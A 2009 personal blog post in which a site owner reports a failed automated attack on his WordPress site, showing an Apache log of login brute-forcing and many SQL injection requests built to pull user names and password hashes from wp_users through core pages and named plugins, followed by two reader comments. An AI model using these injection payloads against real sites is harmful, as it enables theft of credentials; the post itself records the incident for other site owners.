Le portail de la famille Duretz

A libwhisker attack

Written by Laurent Duretz on 14th January 2009 2 Comments

This site has been attacked from a latvia server.  Nothing serious but this is the second time this month.

You can take a look at the following apache log.

?View Code APACHE
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49

94.247.3.38 - - [13/Jan/2009:14:09:56 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:57 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:58 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:09:59 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:01 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:02 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:03 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:04 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:05 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:07 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:08 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:09 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:11 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:13 +0100] "POST /wp-login.php HTTP/1.1" 200 2920 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:15 +0100] "GET /index.php?feed=rss2&p=11/**/union/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a),2/**/from/**/wp_users/**/where/**/user_id=1/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:17 +0100] "GET /index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:24 +0100] "GET /index.php?exact=1&sentence=1&s=%a3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,0x3a,user_login,0x3a,user_pass,0x3a,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23 HTTP/1.1" 200 14673 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:25 +0100] "GET /index.php?cat=%2527%20UNION%20SELECT%20CONCAT(0x3a,user_login,0x3a,user_pass,0x3a)%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:26 +0100] "GET /index.php?cat=999%20UNION%20SELECT%20null,CONCAT(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null%20FROM%20wp_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:27 +0100] "GET /wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=-9999+UNION+SELECT+concat(0x3a,user_login,0x3a,user_pass,0x3a)+FROM+wp_users-- HTTP/1.1" 404 16231 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:28 +0100] "GET /wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4+from+wp_users--&display=plain HTTP/1.1" 404 16247 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:29 +0100] "GET /wp-content/plugins/wp-download/wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from/**/wp_users/* HTTP/1.1" 404 16259 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:30 +0100] "GET /index.php?page_id=13&album=lala&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201 HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:31 +0100] "GET /forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16185 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:32 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users/* HTTP/1.1" 404 16173 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:33 +0100] "GET /sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x3a,user_login,0x3a,user_pass,0x3a),0,0,0,0,0/**/FROM/**/wp_users/* HTTP/1.1" 404 16197 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:34 +0100] "GET /wp-content/plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x3a,user_login,0x3a,user_pass,0x3a)/**/FROM/**/wp_users HTTP/1.1" 404 16263 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:35 +0100] "GET /wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x3a,user_login,0x3a,user_pass,0x3a),concat(0x3a,user_login,0x3a,user_pass,0x3a),4,5/**/FROM/**/wp_users HTTP/1.1" 404 16285 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:36 +0100] "GET /wp-content/plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null,null,null,null%20%20from%20wp_users HTTP/1.1" 404 16357 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:40 +0100] "GET /wp-content/plugins/wp-adserve/adclick.php?id=-1%20union%20select%20concat(0x3a,user_login,0x3a,user_pass,0x3a)%20from%20wp_users HTTP/1.1" 404 16211 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:41 +0100] "GET /wp-content/plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6,7%20from%20wp_users-- HTTP/1.1" 404 16241 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:42 +0100] "GET /wp-content/plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(0x3a,user_login,0x3a,user_pass,0x3a),3,4,5,6%20from%20wp_users-- HTTP/1.1" 404 16251 "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:43 +0100] "GET /index.php?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(0x3a,user_login,0x3a,user_pass,0x3a),null,null,null,null,null+from+wp_tbv_users/* HTTP/1.1" 301 - "-" "Mozilla (libwhisker/2.4)"
94.247.3.38 - - [13/Jan/2009:14:10:44 +0100] "GET / HTTP/1.1" 200 16299 "-" "Mozilla (libwhisker/2.4)"

These request has been done with libwhisker. They have been sent on login page without success or on WordPress plugins I did not install. They also tried SQL injections without anymore success.

  • email
  • Digg
  • Sphinn
  • del.icio.us
  • Facebook
  • Mixx
  • Google Bookmarks
  • Live
  • Technorati
  • Print
Posted in Technologie | Tagged ,

2 Comments to A libwhisker attack

You can follow all the replies to this entry through the comments feed.

  1. Laurent Duretz's Gravatar Laurent Duretz
    21st January 2009 at 1:11 PM | Permalink

    Hi Xavier,

    I don’t ban IP adresses on my server because I never know who is using it.

    I found this site which is talking about security.

    Regards,

    Laurent

  2. xavier's Gravatar xavier
    20th January 2009 at 8:57 AM | Permalink

    Hi
    I get trouble with 94.247.3.38 .
    I try many times to hack my web site with SQL injection.
    I think I didn’t manage to crack my password, but they try.
    Do you know how to ban this IP from my visitor?
    Do you know which plugin is weak or poor for security?

    thanks for you help
    please contact me by email.

    xavier

«
»

Tags